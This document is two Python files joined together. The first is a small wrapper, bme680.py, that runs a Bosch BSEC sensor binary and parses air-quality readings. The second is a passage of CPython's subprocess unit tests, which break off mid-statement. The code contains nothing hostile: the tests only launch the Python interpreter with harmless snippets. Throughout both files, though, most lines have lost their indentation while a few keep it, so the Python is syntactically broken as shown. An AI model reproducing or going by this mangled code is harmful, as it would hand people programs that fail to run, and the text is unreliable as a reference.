bme680.py
#! /usr/bin/env python3
import subprocess
import threading
import re
import os
import time
# Directory containing the Bosch BSEC example binary (bsec_bme680).
BME_DIR = os.path.join(os.path.dirname(__file__), 'bme680_auxbin', 'bsec_bme680_linux')
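# Bme680 launches the bsec_bme680 binary once in a background thread, parses each
# line it prints, and keeps the latest sample; read_data() returns a snapshot of it.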
class Bme680(object):
def __init__(self):
self._data_lock = threading.Lock()
self._ready = False
self._iaq = 0
self._iaq_acc = 0
self._temperature = 0
self._humidity = 0
self._pressure = 0
self._eco2 = 0
self._bvoce = 0
        # Daemon thread, so the background reader does not keep the process alive.
        threading.Thread(target=self._update_data, daemon=True).start()
def _update_data(self):
        p = subprocess.Popen(['./bsec_bme680'], cwd=BME_DIR,
                             stdout=subprocess.PIPE, text=True)
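        # The regex assumes each output line contains the IAQ accuracy in parentheses
        # followed by eight "label: value" numeric fields, matched by index below.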
regex = re.compile(r'\((\d)\).*?: ([\d.]+).*?: ([\d.]+).*?: ([\d.]+).*?: ([\d.]+).*?: ([\d.]+).*?: ([\d.]+).*?: ([\d.]+).*?: ([\d.]+)')
for line in p.stdout:
result = regex.search(line)
if result is None:
raise RuntimeError('BME680: Line "{}" out of expected format'.format(line))
with self._data_lock:
self._ready = True
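                # Values are kept as the matched strings; read_data() converts them.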
self._iaq_acc = result[1]
self._iaq = result[2]
self._temperature = result[3]
self._humidity = result[4]
self._pressure = result[5]
self._eco2 = result[8]
self._bvoce = result[9]
    def read_data(self, interval=0):
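        # Wait `interval` seconds, then block (polling once per second) until the
        # reader thread has published at least one sample.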
ret = None
time.sleep(interval)
while True:
with self._data_lock:
if self._ready:
ret = (int(self._iaq_acc),
float(self._iaq),
float(self._temperature),
float(self._humidity),
float(self._pressure),
float(self._eco2),
float(self._bvoce))
break
time.sleep(1)
return ret
if __name__ == '__main__':
bme680 = Bme680()
    # Press Ctrl+C to stop.
while True:
        data = bme680.read_data(interval=5)
print('''
IAQ accuracy : {}
IAQ : {}
T degC : {}
H %rH : {}
P hPa : {}
eCO2 ppm : {}
bVOCe ppm : {}
'''.format(*data))
test_subprocess.py
import unittest
from test import script_helper
from test import support
import subprocess
import sys
import signal
import io
import locale
import os
import errno
import tempfile
import time
import re
import selectors
import sysconfig
import warnings
import select
import shutil
import gc
import textwrap
try:
import threading
except ImportError:
threading = None
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
try:
mkstemp = tempfile.mkstemp
except AttributeError:
# tempfile.mkstemp is not available
def mkstemp():
"""Replacement for mkstemp, calling mktemp."""
fname = tempfile.mktemp()
return os.open(fname, os.O_RDWR|os.O_CREAT), fname
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = support.strip_python_stderr(stderr)
# strip_python_stderr also strips whitespace, so we do too.
expected = expected.strip()
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(FileNotFoundError, self._assert_python, pre_args,
executable="doesnotexist")
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
original_cwd = os.getcwd()
os.chdir(cwd)
cwd = os.getcwd()
os.chdir(original_cwd)
return cwd
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with script_helper.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
self.addCleanup(p.stderr.close)
self.assertStderrEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"strawberry")
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.addCleanup(p.stdout.close)
self.assertStderrEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') is not None,
'the python library cannot be loaded '
'with an empty environment')
def test_empty_env(self):
with subprocess.Popen([sys.executable, "-c",
'import os; '
'print(list(os.environ.keys()))'],
stdout=subprocess.PIPE,
env={}) as p:
stdout, stderr = p.communicate()
self.assertIn(stdout.strip(),
(b"[]",
# Mac OS X adds __CF_USER_TEXT_ENCODING variable to an empty
# environment
b"['__CF_USER_TEXT_ENCODING']"))
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
    def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen((sys.executable, "-c", "pass"), **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertStderrEqual(stderr, b"")
def test_universal_newlines(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen([sys.executable, "-c", "pass"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
        # A Python debug build pushes something like "[42442 refs]\n"
        # to stderr when the subprocess exits.
# Don't use assertStderrEqual because it strips CR and LF from output.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
import _bootlocale
for encoding in ['utf-16', 'utf-32-be']:
old_getpreferredencoding = _bootlocale.getpreferredencoding
# Indirectly via io.TextIOWrapper, Popen() defaults to
# locale.getpreferredencoding(False) and earlier in Python 3.2 to
# locale.getpreferredencoding().
def getpreferredencoding(do_setlocale=True):
return encoding
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
try:
_bootlocale.getpreferredencoding = getpreferredencoding
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args, universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
stdout, stderr = popen.communicate(input='')
finally:
_bootlocale.getpreferredencoding = old_getpreferredencoding
self.assertEqual(stdout, '1\n2\n3\n4')
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
